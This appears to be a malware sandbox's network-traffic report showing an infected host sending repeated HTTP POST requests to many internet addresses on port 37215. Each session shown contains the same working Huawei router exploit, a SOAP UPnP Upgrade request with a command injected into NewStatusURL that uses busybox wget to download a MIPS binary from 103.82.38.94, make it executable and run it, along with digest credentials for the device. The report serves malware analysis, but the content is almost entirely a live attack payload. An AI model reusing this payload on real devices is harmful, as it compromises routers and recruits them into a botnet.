                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.1450552197.18.235.2737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090254068 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.145503041.170.30.18337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090387106 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7192.168.2.1451436156.125.211.3037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090430975 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8192.168.2.1453474156.110.128.1237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090461969 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9192.168.2.1456612197.33.124.18137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090543985 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10192.168.2.1451938156.67.239.18337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090610981 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192.168.2.1444200197.158.27.7337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090677977 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.1460300156.226.12.3037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090759039 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.1452174156.109.0.5537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090838909 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.1455670197.235.8.18637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090897083 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 